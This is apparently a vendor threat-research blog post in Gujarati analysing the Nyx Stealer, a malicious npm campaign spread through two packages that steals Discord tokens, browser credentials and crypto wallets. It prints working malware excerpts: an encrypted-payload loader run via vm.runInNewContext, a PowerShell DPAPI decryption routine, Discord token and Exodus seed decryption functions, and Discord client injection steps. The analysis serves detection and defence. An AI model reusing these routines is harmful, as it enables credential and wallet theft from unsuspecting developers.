npm ઇન્ફોસ્ટીલર

નવી npm ઇન્ફોસ્ટીલર ડિસ્કવરી: Nyx ​​સ્ટીલર ડિસ્કોર્ડ સત્રોનું હાઇજેક્સ કરે છે

TL; DR

ઝાયજેની સુરક્ષા સંશોધન ટીમ બે દૂષિત પેકેજો દ્વારા વિતરિત કરાયેલ એક અત્યાધુનિક npm ઇન્ફોસ્ટીલર ઝુંબેશ ઓળખી કાઢી: કન્સોલલોફી અને સ્વ-બોટ-લોફી.

નવીનતમ સંસ્કરણ (consolelofy@1.3.0) 216KB AES-એન્ક્રિપ્ટેડ પેલોડ એમ્બેડ કરે છે જે રનટાઇમ પર ડિક્રિપ્ટ થાય છે અને દ્વારા એક્ઝિક્યુટ થાય છે vm.runInNewContext(). કારણ કે દૂષિત તર્ક સંપૂર્ણપણે એન્ક્રિપ્ટેડ છે, સ્ટ્રિંગ નિરીક્ષણ પર આધાર રાખતા સ્ટેટિક સ્કેનર્સ એક્ઝેક્યુશન સમય સુધી તેના વર્તનનું અવલોકન કરી શકતા નથી.

એકવાર ડિક્રિપ્ટ થઈ ગયા પછી, પેલોડ, આંતરિક રીતે બ્રાન્ડેડ Nyx સ્ટીલર, લક્ષ્યો:

  • ડિસ્કોર્ડ પ્રમાણીકરણ ટોકન્સ
  • 50+ બ્રાઉઝર ઓળખપત્ર સ્ટોર્સ
  • 90+ ક્રિપ્ટોકરન્સી વોલેટ એક્સટેન્શન
  • રોબ્લોક્સ, ઇન્સ્ટાગ્રામ, સ્પોટાઇફ, સ્ટીમ, ટેલિગ્રામ અને ટિકટોક સત્રો
  • ડિસ્કોર્ડ ડેસ્કટોપ ક્લાયંટ પર્સિસ્ટન્સ

બંને પેકેજોના બધા 20 વર્ઝનની જાણ કરવામાં આવી હતી અને દૂષિત હોવાની પુષ્ટિ કરવામાં આવી હતી.

આ npm ઇન્ફોસ્ટીલરનું ટેકનિકલ ઝાંખી

પરંપરાગત ઇન્સ્ટોલ-ટાઇમ માલવેરથી વિપરીત, આ ઝુંબેશ એક પર આધાર રાખે છે રનટાઇમ ડિક્રિપ્શન મોડેલ.

ત્યા છે:

  • કોઈ દૂષિત નથી preinstall or postinstall hooks
  • કોઈ સ્પષ્ટ ઇન્સ્ટોલ-ટાઇમ નેટવર્ક કોલ્સ નથી
  • કોઈ સાદા લખાણ ઓળખપત્ર લણણી તર્ક નથી

જ્યારે મોડ્યુલ આયાત કરવામાં આવે છે ત્યારે પેલોડ સક્રિય થાય છે. સમગ્ર દૂષિત બોડી એન્ક્રિપ્ટેડ હોય છે અને રનટાઇમ વખતે મેમરીમાં જ દેખાય છે.

આ ડિઝાઇન ખાસ કરીને પેકેજ ઇન્સ્ટોલેશન દરમિયાન શોધ ટાળે છે.

આ npm ઇન્ફોસ્ટીલર ખરેખર કેવી રીતે કાર્ય કરે છે

Nyx સ્ટીલર શું ચોરી કરે છે તેનું વિશ્લેષણ કરતા પહેલા, આપણે સમજવાની જરૂર છે તે કેવી રીતે અમલમાં આવે છે.

આ npm ઇન્ફોસ્ટીલરની અંદરનો દૂષિત તર્ક એક સુસંગત પેટર્નને અનુસરે છે:

એક નાનો લોડર મોટા એન્ક્રિપ્ટેડ પેલોડને ડિક્રિપ્ટ કરે છે અને તેને Node.js VM સંદર્ભમાં ગતિશીલ રીતે એક્ઝિક્યુટ કરે છે.

આ ડિઝાઇન ઇરાદાપૂર્વકની છે. હુમલાખોર ફક્ત અસ્પષ્ટતા પાછળ કાર્યક્ષમતા છુપાવી રહ્યો નથી, તેઓ છે સ્ટેટિક દૃશ્યતામાંથી દૂષિત કોડને સંપૂર્ણપણે દૂર કરવું.

ઉચ્ચ-સ્તરીય અમલીકરણ મોડેલ

ઉચ્ચ સ્તરે, રેપર ચાર કાર્યો કરે છે:

  • SHA-256 નો ઉપયોગ કરીને હાર્ડકોડેડ પાસફ્રેઝમાંથી AES કી મેળવે છે.
  • AES-256-CBC નો ઉપયોગ કરીને મોટા હેક્સ-એન્કોડેડ સાઇફરટેક્સ્ટને ડિક્રિપ્ટ કરે છે.
  • ડિક્રિપ્ટેડ જાવાસ્ક્રિપ્ટનો ઉપયોગ કરીને એક્ઝિક્યુટ કરે છે vm.runInNewContext()
  • એક સેન્ડબોક્સ પૂરું પાડે છે જે હજુ પણ શક્તિશાળી રનટાઇમ પ્રિમિટિવ્સને ખુલ્લા પાડે છે

મુખ્ય તકનીકનો સારાંશ

પુન રૂપરેખાંકન / મૂલ્ય
અલ્ગોરિધમ એઇએસ -256-સીબીસી
કી વ્યુત્પત્તિ SHA-256(પાસફ્રેઝ)
ઇનિશિયલાઇઝેશન વેક્ટર (IV) 0x00 ના 16 બાઇટ્સ
અમલ vm.runInNewContext(ડિક્રિપ્ટેડ, સેન્ડબોક્સ)

ગંભીર રીતે, સેન્ડબોક્સ આમાંથી પસાર થાય છે:

  • require
  • process
  • Buffer
  • ટાઇમર્સ
  • મોડ્યુલ નિકાસ

આનો અર્થ એ થાય કે ડિક્રિપ્ટેડ પેલોડ સંપૂર્ણ ક્ષમતા જાળવી રાખે છે:

  • સ્પાન પ્રક્રિયાઓ
  • ફાઇલો વાંચો અને લખો
  • નેટવર્ક કૉલ્સ કરો
  • સ્થાનિક એપ્લિકેશનોમાં ફેરફાર કરો

આ પ્રતિબંધિત VM નથી. તે એક્ઝેક્યુશન ટ્રેમ્પોલિન તરીકે ઉપયોગમાં લેવાતું VM છે.

રનટાઇમ એન્ક્રિપ્શન પેટર્ન (કોર એક્ઝેક્યુશન મિકેનિઝમ)

લોડર નાનું છે.
દુર્ભાવનાપૂર્ણ શરીર નથી.

પેકેજની અંદર જોવા મળતી એક્ઝેક્યુશન પેટર્ન નીચે મુજબ છે:

const crypto = require('crypto'); const vm = require('vm');  function decryptAndExecute(encryptedHex, passphrase) {     const key = crypto.createHash('sha256')                       .update(passphrase)                       .digest();      const iv = Buffer.alloc(16, 0);      const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);     let decrypted = decipher.update(encryptedHex, 'hex', 'utf8');     decrypted += decipher.final('utf8');      const sandbox = {         require,         module,         exports,         console,         process,         Buffer,         __dirname,         __filename,         setTimeout,         setInterval,         clearTimeout,         clearInterval     };      vm.runInNewContext(decrypted, sandbox); }

આ કેમ મહત્વનું છે

ડિક્રિપ્ટેડ પેલોડ:

  • કરે છે નથી npm પેકેજની અંદર સાદા ટેક્સ્ટમાં અસ્તિત્વમાં છે
  • સરળ માટે અદ્રશ્ય છે grep અથવા સ્ટેટિક સ્ટ્રિંગ સ્કેનિંગ
  • ફક્ત રનટાઇમ પર મેમરીમાં ભૌતિક બને છે
  • સંપૂર્ણ નોડ રનટાઇમ ક્ષમતાઓ સાથે કાર્ય કરે છે

આ AES + VM એક્ઝેક્યુશન કોમ્બિનેશન એક મજબૂત વર્તણૂકીય સૂચક છે npm ઇન્ફોસ્ટીલર સ્ટેટિક ઇન્સ્પેક્શનથી બચવાનો પ્રયાસ કરી રહ્યો છે.

અન્ય શબ્દોમાં:

જો તમે પેકેજ સોર્સ ટ્રી સ્કેન કરો છો, તો તમને ચોરી કરનાર દેખાતો નથી.
તમે એક ડિક્રિપ્ટર જુઓ છો.

ડિક્રિપ્શન પછી શું થાય છે

એકવાર અમલમાં મૂક્યા પછી, Nyx સ્ટીલર સમાંતર ડેટા કલેક્શન વેવ્સ લોન્ચ કરે છે.

વેવ 1: બ્રાઉઝર ઓળખપત્ર નિષ્કર્ષણ

માલવેર:

  • NuGet CDN માંથી Python રનટાઇમ ડાઉનલોડ કરે છે
  • ક્રિપ્ટોગ્રાફિક લાઇબ્રેરીઓ ઇન્સ્ટોલ કરે છે
  • ક્રોમિયમ-આધારિત ઓળખપત્ર સ્ટોર્સ કાઢે છે
  • DPAPI-સંરક્ષિત રહસ્યોને ડિક્રિપ્ટ કરે છે

મૂળ બાઇન્ડિંગ્સ કમ્પાઇલ કરવાને બદલે, તે સીધા વિન્ડોઝ DPAPI ને કૉલ કરવા માટે પાવરશેલનો ઉપયોગ કરે છે.

function dpapiUnprotectWithPowerShell(dataBuf) {     const b64 = dataBuf.toString('base64');      const ps =         "Add-Type -AssemblyName System.Security;" +         "$b=[Convert]::FromBase64String('" + b64 + "');" +         "$p=[System.Security.Cryptography.ProtectedData]::Unprotect(" +         "$b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);" +         "[Console]::Out.Write([Convert]::ToBase64String($p))";      const cmd =         `powershell -NoProfile -ExecutionPolicy Bypass -Command "${ps}"`;      return Buffer.from(execSync(cmd, { encoding: 'utf8' }).trim(), 'base64'); }

આ અભિગમ:

  • સંકલન કલાકૃતિઓ ટાળે છે
  • મૂળ વિન્ડોઝ ક્રિપ્ટો API નો ઉપયોગ કરે છે
  • વહીવટી સાધનોમાં ભળી જાય છે

તે OS-સ્તરનું ઓળખપત્ર ડિક્રિપ્શન છે, સ્ક્રેપિંગ નહીં.

વેવ 2: ડિસ્કોર્ડ ટોકન ડિક્રિપ્શન

ચોરી કરનાર પ્રોટોકોલથી વાકેફ છે. તે ડિસ્કોર્ડના એન્ક્રિપ્ટેડ ટોકન ફોર્મેટને સમજે છે.

function decryptToken(encryptedToken, key) {     const tokenParts = encryptedToken.split('dQw4w9WgXcQ:');     const encryptedData = Buffer.from(tokenParts[1], 'base64');      const iv = encryptedData.slice(3, 15);     const ciphertext = encryptedData.slice(15, -16);     const tag = encryptedData.slice(-16);      const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);     decipher.setAuthTag(tag);      return decipher.update(ciphertext).toString('utf8'); }

કાર્યકારી પ્રવાહ:

  • ડિસ્કોર્ડમાંથી માસ્ટર કી કાઢો Local State
  • DPAPI દ્વારા માસ્ટર કીને ડિક્રિપ્ટ કરો
  • AES-GCM ટોકન બ્લોબ્સને ડિક્રિપ્ટ કરો
  • ડિસ્કોર્ડ API સામે ટોકન્સ માન્ય કરો
  • નાઈટ્રો, બેજેસ, બિલિંગ માહિતીથી સમૃદ્ધ બનાવો

આ સામાન્ય ઓળખપત્ર ડમ્પિંગ નથી. તે પ્રોટોકોલ-જાગૃત સત્ર હાઇજેકિંગ છે.

વેવ 3: ક્રિપ્ટોકરન્સી વોલેટ ટાર્ગેટિંગ

npm ઇન્ફોસ્ટીલર ગણતરી કરે છે:

  • 90+ બ્રાઉઝર વોલેટ એક્સટેન્શન
  • 27 ડેસ્કટોપ વોલેટ્સ
  • ઠંડા વૉલેટ રસ્તાઓ
  • એક્ઝોડસ સીડ ફાઇલો

બીજ ડિક્રિપ્શન પ્રયાસનું ઉદાહરણ:

function decryptSeco(content, password) {     const key = crypto.pbkdf2Sync(password, 'exodus', 10000, 32, 'sha512');      const decipher = crypto.createDecipheriv(         'aes-256-gcm',         key,         content.slice(0, 12)     );      decipher.setAuthTag(content.slice(-16));      return Buffer.concat([         decipher.update(content.slice(12, -16)),         decipher.final()     ]).toString('utf8'); }

જો સફળ થાય, તો વોલેટ સમાધાન તાત્કાલિક અને બદલી ન શકાય તેવું છે.

આ ઝુંબેશના ઉચ્ચતમ-મૂલ્યના મુદ્રીકરણ વેક્ટરનું પ્રતિનિધિત્વ કરે છે.

ડિસ્કોર્ડ ડેસ્કટોપ ઇન્જેક્શન દ્વારા દ્રઢતા

ઓળખપત્રો એકત્રિત કર્યા પછી, Nyx સ્ટીલર સ્થાનિકમાં ફેરફાર કરીને દ્રઢતાનો પ્રયાસ કરે છે વિરામ ક્લાઈન્ટ.

લક્ષ્યાંક:

%LOCALAPPDATA%\Discord*\app-*\modules\discord_desktop_core\index.js

ઓપરેશનલ સિક્વન્સ

ઇન્ફોસ્ટીલર નીચેના પગલાંઓ કરે છે:

  • ચાલી રહેલ ડિસ્કોર્ડ પ્રક્રિયાઓને સમાપ્ત કરે છે
  • ઇન્સ્ટોલ કરેલ ડિસ્કોર્ડ વેરિઅન્ટ્સ (સ્ટેબલ, કેનેરી, પીટીબી) શોધે છે.
  • ઓવરરાઇટ કરે છે discord_desktop_core/index.js
  • હુમલાખોર-નિયંત્રિત વેબહૂક લોજિક ઇન્જેક્ટ કરે છે
  • ડિસ્કોર્ડ ફરી શરૂ થાય છે

આ સુનિશ્ચિત કરે છે કે ભવિષ્યના ડિસ્કોર્ડ સત્રો આપમેળે નવા પ્રમાણીકરણ ટોકન્સ લીક ​​કરે છે.

મહત્વપૂર્ણ વાત એ છે કે, આ દ્રઢતા સુનિશ્ચિત કાર્યો અથવા રજિસ્ટ્રી ફેરફારો પર આધાર રાખતી નથી. તે એપ્લિકેશન-સ્તરના કોડ ફેરફારનો ઉપયોગ કરે છે, જે એક ગુપ્ત અભિગમ છે.

જો દૂષિત npm પેકેજ પછીથી દૂર કરવામાં આવે તો પણ, ડિસ્કોર્ડ ક્લાયંટ સાથે ચેડા થાય છે.

ટેકનિકલ સરખામણી: કાયદેસર સેલ્ફબોટ વિરુદ્ધ npm ઇન્ફોસ્ટીલર

પુન કાયદેસર પુસ્તકાલય Nyx npm ઇન્ફોસ્ટીલર
એન્ક્રિપ્શન કંઈ સંપૂર્ણ AES-એન્ક્રિપ્ટેડ પેલોડ
રનટાઇમ VM જરૂર નથી vm.runInNewContext અમલ
ઓળખપત્ર ઍક્સેસ ફક્ત ડિસ્કોર્ડ API બ્રાઉઝર, વોલેટ્સ, DPAPI
બાહ્ય ડાઉનલોડ્સ ના ન્યુગેટ દ્વારા પાયથોન રનટાઇમ
દ્રઢતા ના ડિસ્કોર્ડ ક્લાયંટ ઇન્જેક્શન
મુદ્રીકરણ બોટ ઓટોમેશન ઓળખપત્ર પુનર્વેચાણ

એકલા એન્ક્રિપ્શન સ્તર જ આ ઝુંબેશને લાક્ષણિક ઓપન-સોર્સ ફોર્કથી અલગ કરે છે.

એક કાયદેસર ડિસ્કોર્ડ સેલ્ફબોટ પાસે તેના સમગ્ર કોડબેઝને એન્ક્રિપ્ટ કરવાનું, DPAPI ઍક્સેસ કરવા માટે પાવરશેલ બનાવવાનું, બાહ્ય રનટાઇમ ડાઉનલોડ કરવાનું અથવા ડેસ્કટોપ એપ્લિકેશન ઇન્ટર્નલ્સને સંશોધિત કરવાનું કોઈ કારણ નથી. જ્યારે તે ક્ષમતાઓ ડિસકોર્ડ ક્રિયાપ્રતિક્રિયાઓને સ્વચાલિત કરવાનો દાવો કરતી ડિપેન્ડન્સીમાં દેખાય છે, ત્યારે આર્કિટેક્ચરલ મિસમેચને અવગણવું અશક્ય બની જાય છે.

તપાસના દૃષ્ટિકોણથી, આ npm ઇન્ફોસ્ટીલર બહુવિધ સ્તરોમાં નિશાનો છોડી દે છે. જોકે, સૌથી વિશ્વસનીય સૂચકાંકો હાર્ડકોડેડ URL અથવા ચોક્કસ ફાઇલ પાથ નથી, કારણ કે તે સંસ્કરણો વચ્ચે બદલાઈ શકે છે. તેના બદલે, ટકાઉ સંકેતો માળખાકીય છે.

પેકેજ સ્તરે, સૌથી મજબૂત લાલ ધ્વજ એ મોટા એન્ક્રિપ્ટેડ પેલોડ અને રનટાઇમ ડિક્રિપ્શન રેપરનું સંયોજન છે જે તરત જ આ દ્વારા એક્ઝિક્યુટ થાય છે vm.runInNewContext(). જ્યારે ફક્ત એન્ક્રિપ્શન જ સ્વાભાવિક રીતે દૂષિત નથી, ત્યારે ડિસ્કોર્ડ યુટિલિટી પેકેજની અંદર AES ડિક્રિપ્શન અને ત્યારબાદ ડાયનેમિક VM એક્ઝેક્યુશનનો ઉપયોગ કરવો ખૂબ જ અસામાન્ય છે.

હોસ્ટ સ્તરે, શંકાસ્પદ પેટર્નમાં અણધારી DPAPI ડિક્રિપ્શન પ્રવૃત્તિ, Node.js ડિપેન્ડન્સી સંદર્ભમાંથી પ્રક્રિયા પેદા થવી, અને સ્થાનિક એપ્લિકેશન ફાઇલોમાં ફેરફારનો સમાવેશ થાય છે જેને તૃતીય-પક્ષ લાઇબ્રેરીઓ દ્વારા ક્યારેય બદલવો જોઈએ નહીં. તેવી જ રીતે, નેટવર્ક સ્તર પર, ડેવલપમેન્ટ ડિપેન્ડન્સી દ્વારા શરૂ કરાયેલ આઉટબાઉન્ડ વેબહૂક-શૈલી સંચાર બીજી અર્થપૂર્ણ વિસંગતતા રજૂ કરે છે.

બીજા શબ્દોમાં કહીએ તો, શોધ સપાટી સમાધાનનું એક પણ સૂચક નથી. તે એન્ક્રિપ્શન, રનટાઇમ એક્ઝેક્યુશન, ઓળખપત્ર ઍક્સેસ અને દ્રઢતા વર્તનનો સહસંબંધ છે જે ખતરાને છતી કરે છે.

ઝાયજેની સાથે શોધ અને શમન

npm ઇન્ફોસ્ટીલર

આ npm ઇન્ફોસ્ટીલરની ઓળખ આના દ્વારા કરવામાં આવી હતી ઝાયજેની માલવેર પ્રારંભિક ચેતવણી (MEW) સરળ સહી મેચિંગને બદલે સ્તરીય વર્તણૂકીય સહસંબંધ દ્વારા.

જાણીતા દૂષિત શબ્દમાળાઓ શોધવાને બદલે, MEW સંપૂર્ણ સ્રોત વૃક્ષમાં માળખાકીય વિસંગતતાઓનું મૂલ્યાંકન કરે છે. આ કિસ્સામાં, શોધ ઘણા સંકેતોના સંકલનમાંથી ઉભરી આવી: મોડ્યુલ એન્ટ્રી પોઈન્ટમાં એમ્બેડેડ AES ડિક્રિપ્શન રૂટિન, VM સંદર્ભમાં તાત્કાલિક અમલીકરણ, અને સ્પષ્ટ ક્ષમતા-થી-ઉદ્દેશ મેળ ખાતી નથી.

મહત્વપૂર્ણ વાત એ છે કે, આમાંથી કોઈ પણ સંકેત એકલા દૂષિત ઇરાદાને સાબિત કરતા નથી. જો કે, જ્યારે એકસાથે વિશ્લેષણ કરવામાં આવે છે, ત્યારે તેઓ રનટાઇમ વર્તણૂકને છુપાવવાના પ્રયાસને ઉજાગર કરે છે. આ સ્તરીય અભિગમ ઉચ્ચ-વિશ્વાસ સપ્લાય ચેઇન જોખમોને ઓળખતી વખતે ખોટા હકારાત્મકતાને નોંધપાત્ર રીતે ઘટાડે છે.

વધુમાં, આ કિસ્સો દર્શાવે છે કે શા માટે ફક્ત ઇન્સ્ટોલ-ટાઇમ નિરીક્ષણ પૂરતું નથી. દૂષિત તર્ક જીવનચક્ર સ્ક્રિપ્ટોમાં રહેતો નથી. તે મોડ્યુલ લોડ થયા પછી જ સક્રિય થાય છે અને મેમરીમાં ડિક્રિપ્ટ થયા પછી જ દૃશ્યમાન થાય છે. તેથી, અસરકારક સંરક્ષણ માટે એન્ક્રિપ્શન-જાગૃત વિશ્લેષણ, વર્તણૂકીય પેટર્ન ઓળખ અને ઇન્સ્ટોલેશન ઇવેન્ટ્સ ઉપરાંત સતત નિર્ભરતા દેખરેખની જરૂર છે.

રજિસ્ટ્રી દૂર કરવું પ્રતિક્રિયાશીલ છે. રનટાઇમ-અવેર વિશ્લેષણ નિવારક છે.

આ npm ઇન્ફોસ્ટીલર શા માટે મહત્વપૂર્ણ છે

Nyx સ્ટીલર npm-આધારિત માલવેરમાં માળખાકીય ઉત્ક્રાંતિનું પ્રતિનિધિત્વ કરે છે.

ઐતિહાસિક રીતે, ઘણા દૂષિત પેકેજો દૃશ્યમાન ઇન્સ્ટોલ-ટાઇમ સ્ક્રિપ્ટ્સ અથવા સ્પષ્ટ ઓળખપત્ર એક્સફિલ્ટ્રેશન એન્ડપોઇન્ટ્સ પર આધાર રાખતા હતા. તેનાથી વિપરીત, આ ઝુંબેશ તેના પેલોડને એન્ક્રિપ્ટ કરે છે, એક્ઝેક્યુશનને રનટાઇમ પર મુલતવી રાખે છે, કાયદેસર ઓપરેટિંગ સિસ્ટમ API નો લાભ લે છે અને વિશ્વસનીય એપ્લિકેશનોમાં સ્થિરતા સ્થાપિત કરે છે.

પરિણામે, હુમલાખોરને npm ઇન્ફ્રાસ્ટ્રક્ચરનો ઉપયોગ કરવાની જરૂર નથી. તેના બદલે, હુમલો સફળ થાય છે કારણ કે ડિપેન્ડન્સી ઇન્સ્ટોલેશન વિશ્વાસ સૂચવે છે. ડેવલપર્સ ધારે છે કે લાઇબ્રેરી આયાત કરવી એ એક સલામત કામગીરી છે, ખાસ કરીને જ્યારે તે પોતાને લોકપ્રિય ટૂલના સંભવિત ફોર્ક તરીકે રજૂ કરે છે.

જેમ જેમ ઇકોસિસ્ટમ્સનો વિકાસ થતો રહે છે અને ફોર્ક્સનો ફેલાવો થતો રહે છે, તેમ તેમ ગર્ભિત વિશ્વાસ સીમા વધુને વધુ આકર્ષક હુમલો સપાટી બની જાય છે. તેથી, આધુનિક npm ઇન્ફોસ્ટીલર્સ સામે રક્ષણ મેળવવા માટે સ્થિર સ્ટ્રિંગ્સ શોધવાને બદલે સ્થાપત્ય પેટર્નને ઓળખવાની જરૂર છે.

આખરે, આ ઝુંબેશ એક મહત્વપૂર્ણ પાઠને મજબૂત બનાવે છે software supply chain security: સૌથી ખતરનાક ધમકીઓ એ નથી જે પહેલી નજરે દુર્ભાવનાપૂર્ણ લાગે છે, પરંતુ તે છે જે માળખાકીય રીતે કાયદેસર લાગે છે જ્યાં સુધી રનટાઇમ તેમના સાચા વર્તનને જાહેર ન કરે.

સ્કા-ટૂલ્સ-સોફ્ટવેર-રચના-વિશ્લેષણ-ટૂલ્સ
તમારા સોફ્ટવેર જોખમોને પ્રાથમિકતા આપો, સુધારણા કરો અને સુરક્ષિત કરો
તમારું મફત ખાતું મેળવો.
કોઈ ક્રેડિટ કાર્ડ જરૂરી નથી.

તમારા સોફ્ટવેર ડેવલપમેન્ટ અને ડિલિવરી સુરક્ષિત કરો

ઝાયજેની પ્રોડક્ટ સ્યુટ સાથે